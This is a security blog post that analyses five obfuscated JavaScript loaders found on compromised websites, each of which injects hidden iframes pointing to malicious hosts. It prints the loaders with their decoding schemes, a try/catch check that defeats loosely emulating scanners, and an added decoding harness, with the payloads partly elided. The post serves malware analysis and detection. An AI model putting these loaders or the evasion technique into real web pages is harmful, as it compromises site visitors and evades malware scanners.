Monday, July 29, 2013

5 killer JavaScript threats blacklisting your website

5 samples of JavaScript threats detected on publicly available websites

Blacklisting check by Quttera website malware scanner (screenshot)

We have been collecting obfuscated JavaScript threats during the last week. This post covers some interesting malicious scripts discovered on websites scanned by our free public website malware scanner. The websites were either already blacklisted by Google and/or other website integrity listings, or were blacklisted later.

Overview of the JavaScript threats injected into web pages


All of the presented threats were used to transparently inject hidden malicious iframes into legitimate web content and compromise visitors without any user action.
Code obfuscation converts original source code or a script into code that is hard to read while keeping its behaviour; obfuscated code hides its original purpose from anyone inspecting it.

Usually, code obfuscation is done with publicly available automatic tools and requires no prior knowledge or computer science degree to run. Code obfuscation was originally used to protect developers' intellectual property, but it is now widely used on malicious scripts to defeat the pattern-based detection mechanisms commonly installed in visitors' browsers. The samples below combine obfuscation with an environment check: the decoding constants are assigned only inside a catch block, which is reached because a browser throws when the loader tries to increment or decrement document.body, so a scanner that emulates the DOM loosely never decodes the payload.

All analyzed obfuscated web threats were found on the home page of the infected sites, and the script ran while the home page was loading. This means the content referenced by the hidden iframes was fetched by the browser before the visitor saw any content of the targeted website itself.


Sample 1


Malicious action: injects a hidden iframe pointing to http://rock-reform[.]info/js/esd.php

  ps = "split";
  e = eval;                       // identifier dropped in extraction; restored from the e(...) calls below
  x = "0x";                       // hex prefix; the original variable name was lost in extraction, "x" is a stand-in
  a = 0;
  z = "y";
  try {
      a *= 25                     // 0 * 25 is still 0, so the "if" below always runs
  } catch (zz) {
      a = 1
  }
  if (!a) {
      try {
          --e("doc" + "ument")["\x62od" + z]      // --document.body: a browser throws because body only accepts an element
      } catch (q) {
          a2 = "_";               // separator and offset exist only if the probe threw
          sa = 0xa - 02;          // 10 - 2 = 8
      }
      z = "28_6e_7d_76_6b_7c_71_77_76_28_82_82_ ... 6e_6e_6e_30_31_43_15_12_85_15_12_85_15_12" [ps](a2);   // payload elided in the post
      za = "";
      for (i = 0; i < z.length; i++) {
          za += String["fromCharCode"](e(x + z[i]) - sa);    // eval("0x28") - 8 = 32, and so on
      }
      zaz = za;
      e(zaz);                     // second stage: the iframe injector
  }




Full threat dump: http://pastebin.com/fMEKEuTY




Sample 2


Malicious action: injects a hidden iframe pointing to http://cerfust[.]nl/paprika/clik[.]php
 


  try {
      window.document.body++              // a browser throws here (document.body rejects a number)
  } catch (gdsgsdg) {
      dbshre = 147;                       // assigned only if the probe threw; otherwise the next line throws ReferenceError and the script stops
  }
  if (dbshre) {
      asd = 0;
      try {
          d = document.createElement("div");
          d.innerHTML.a = "asd";          // silently ignored in a browser; throws in a sandbox without createElement
      } catch (agdsg) {
          asd = 1;
      }
      if (!asd) {
          e = eval;                       // "e" exists only if createElement worked
      }
      ss = String;
      asgq = new Array(31, 94, 110, 104, 94, 107, 97, 104, 104, 27, 31, 33, 25, ..., 34, 53);   // 484 entries; elided in the post
      s = "";
      for (i = 0; i - 484 != 0; i++) {
          // 020 is octal 16, so (020 == 0x10) % 26 % 26 is 1 and the condition reduces to window.document;
          // the "&&" was lost in extraction and is restored here
          if ((020 == 0x10) % 26 % 26 && window.document) s += ss["fromCharCode"](1 * asgq[i] - (i % 5 - 5 - 4));
      }
      z = s;
      e(s);                               // second stage
  }


Full threat dump: http://pastebin.com/75Bu9XNb



 

Sample 3


Malicious action: injects a hidden iframe pointing to http://cafelum[.]ru/tmp/46nqizls.php
 



  d = "doc" + "ument";              // identifier restored from e(d) below
  try {
      ++document.body                 // throws in a browser, and only then is the decoder defined
  } catch (q) {
      aa = function (ff) {            // decoder: reads the globals z, x and e, appends to za
          for (i = 0; i < z.length; i++) {
              za += String[ff](e(x + z[i]) - 12);       // eval("0x2c") - 12 = 32, and so on
          }
      };
  };
  ps = "split";
  e = (eval);
  x = "0x";                           // hex prefix; variable name lost in extraction, "x" is a stand-in
  a = 0;
  z = "y";
  try {;                              // empty try, so a stays 0
  } catch (zz) {
      a = 1
  }
  if (!a) {
      try {
          ++e(d)["bod" + z]           // ++document.body again
      } catch (q) {
          a2 = "_";                   // separator exists only if the probe threw
      }
      z = "2c_72_81_7a_6f_80_75_7b_ ... 34_35_47_19_16_89_19_16_89_19_16" [ps](a2);   // payload elided in the post
      za = "";
      aa("fromCharCode");
      zaz = za;
      e(zaz);                         // second stage
  }
 

Full threat dump: http://pastebin.com/Ygu28hTp



Sample 4


Malicious action: injects a hidden iframe pointing to http://oc-sports[.]com/email/clik.php



  // Same loader as Sample 1, with a different encoded payload and target.
  ps = "split";
  e = eval;                       // identifier dropped in extraction; restored from the e(...) calls below
  x = "0x";                       // hex prefix; variable name lost in extraction, "x" is a stand-in
  a = 0;
  z = "y";
  try {
      a *= 25
  } catch (zz) {
      a = 1
  }
  if (!a) {
      try {
          --e("doc" + "ument")["\x62od" + z]      // --document.body: throws in a browser
      } catch (q) {
          a2 = "_";
          sa = 0xa - 02;          // 8
      }
      z = "28_6e_7d_76_6b_7c..._15_12_85_15_12_85_15_12" [ps](a2);   // payload elided in the post
      za = "";
      for (i = 0; i < z.length; i++) {
          za += String["fromCharCode"](e(x + z[i]) - sa);
      }
      zaz = za;
      e(zaz);
  }


Full threat dump: http://pastebin.com/kECUdVDE


 

Sample 5


Malicious action: generates and injects hidden iframes pointing to random websites in the .ru zone



  try {
      prototype % 2;                      // "prototype" is not defined, so this always throws
  } catch (asd) {
      x = 2;
  }
  try {
      // as extracted, the ternary yields "cr"; document["cr"] is not a function, so this throws in any environment
      q = document[(x) ? "c" + "r" : 2 + "e" + "a" + "t" + "e" + "E" + "l" + "e" + "m" + ((f) ? "e" + "n" + "t" : "")]("p");
      q.appendChild(+ "");                // an identifier before "+" was dropped in extraction
  } catch (fwbewe) {
      i = 0;
      try {
          prototype * 5;                  // throws again; the catch block holds the encoded payload
      } catch (z) {
          fr = "fromChar";
          f = [510, 702, 550, 594, 580, 630, 555, 660, ... 264, 160, 318, 240, 288, 205, 354];   // 1776 entries; elided in the post
          v = "eva";
      }
      if (v) e = window[v + "l"];         // window["eval"]; identifier restored from v = "eva"
      w = f;
      s = [];
      r = String;
      z = ((e) ? "Code" : "");
      for (; 1776 - 5 + 5 > i; i += 1) {
          j = i;
          // String.fromCharCode(w[j] / 5) for even j, / 6 for odd j
          if (e) s = s + r[fr + ((e) ? "Code" : 12)]((w[j] / (5 + e("j%2"))));
      }
      if (f) e(s);                        // second stage
  }

Full threat dump: http://pastebin.com/3LJDBMCL
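The decoding schemes and the environment gate shared by Samples 1 to 5, as an added analysis harness written for this post's examples; it is not code from the original post or from Quttera's scanner. It assumes nothing beyond the fragments printed above: the hex fragments and integer arrays used as inputs are the visible parts of the payloads, the array positions used for the trailing fragments follow from the loop bounds 484 and 1776, and browserLikeDocument and naiveStubDocument are constructed stand-ins for a browser DOM and a loose sandbox.

```javascript
// Added analysis harness for the five samples above (not code from the post).
// It re-implements the three decoding schemes the loaders use so the second
// stage can be recovered without executing it, and models the try/catch
// environment gate that guards the decoder constants.

// Scheme A (samples 1, 3 and 4): "_"-separated hex bytes. The loader evaluates
// "0x" + token and subtracts a constant (8 = 0xa - 02 in samples 1 and 4,
// 12 in sample 3). Number("0x28") gives the same result as the loader's eval.
function decodeHexUnderscore(blob, offset, separator = "_") {
  return blob
    .split(separator)
    .filter((tok) => tok.length > 0) // tolerate a trailing separator in a cut fragment
    .map((tok) => String.fromCharCode(Number("0x" + tok) - offset))
    .join("");
}

// Scheme B (sample 2): integer array, char = a[i] - (i % 5 - 5 - 4), i.e.
// a[i] + 9 - (i % 5). The key depends on the index, so a fragment cut from
// the 484-entry array (the loop bound) must be decoded at its original position.
function decodeShiftedArray(values, startIndex = 0) {
  let out = "";
  for (let k = 0; k < values.length; k++) {
    const i = startIndex + k;
    out += String.fromCharCode(values[k] - (i % 5 - 5 - 4));
  }
  return out;
}

// Scheme C (sample 5): integer array, char = a[j] / (5 + j % 2): even
// positions were multiplied by 5, odd positions by 6 (the loader obtains
// j % 2 through eval("j%2")). The loop bound 1776 - 5 + 5 fixes the length.
function decodeScaledArray(values, startIndex = 0) {
  let out = "";
  for (let k = 0; k < values.length; k++) {
    const j = startIndex + k;
    out += String.fromCharCode(values[k] / (5 + (j % 2)));
  }
  return out;
}

// The gate from sample 1, with the document passed in instead of eval("document").
// The separator and offset exist only if --document.body threw: browsers reject a
// non-element value for document.body, and an engine without a DOM throws
// ReferenceError, but a sandbox that stubs document as a plain object does not
// throw, so the payload never decodes there.
function sample1Gate(doc) {
  let a = 0;
  const z = "y";
  let a2, sa;
  try { a *= 25; } catch (zz) { a = 1; } // 0 * 25 is 0, so the "if" below always runs
  if (!a) {
    try {
      --doc["\x62od" + z];            // "body"
    } catch (q) {
      a2 = "_";
      sa = 0xa - 0o2;                 // the loader writes the legacy octal 02; value 8
    }
  }
  return { a2, sa };
}

// Constructed stand-ins for two execution environments (not real DOM objects):
// one rejects assignments to body like a browser, the other accepts anything.
const browserLikeDocument = {
  get body() { return {}; },
  set body(value) { throw new TypeError("body must be an element, got " + typeof value); },
};
const naiveStubDocument = { body: {} };

// Sample 1 end to end with eval replaced by a capture: the decoded second stage
// lands in `captured` for inspection instead of running. `blob` is the hex
// payload string (the fragment visible in the post is enough to see the start).
function recoverSample1Stage2(blob, doc) {
  const captured = [];
  const e = (code) => { captured.push(String(code)); }; // stands in for e = eval
  const { a2, sa } = sample1Gate(doc);
  if (a2 === undefined) return { decoded: null, captured }; // gate shut: the real loader fails with sa undefined
  const zaz = decodeHexUnderscore(blob, sa, a2);
  e(zaz);
  return { decoded: zaz, captured };
}
```

Decoding the visible prefixes with this harness shows that each second stage begins with a function definition (" function zz" for Sample 1, "(function () " for Sample 2, "function" for Sample 5) and the visible tails end in ");" or "}\r\n", so the elided middle is the body of the function that builds the iframe. Calling sample1Gate with naiveStubDocument shows why a sandbox that merely defines document as a plain object comes back with nothing.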

Summary

As stated earlier, these threats were the reason the websites got blacklisted. Judging from their history, the sites were not intentionally malicious; they had been compromised to serve the attackers. Scanning your website regularly can save you the trouble of getting off a blacklist and the traffic loss that comes with it, by catching the injection at an early stage of the attack.

Malware clean-up


Such malware is often hidden inside a JavaScript file. If you suspect that your website has been infected by similar malware, use Website Anti-malware Monitoring for real-time anti-malware monitoring and for remediation assessment.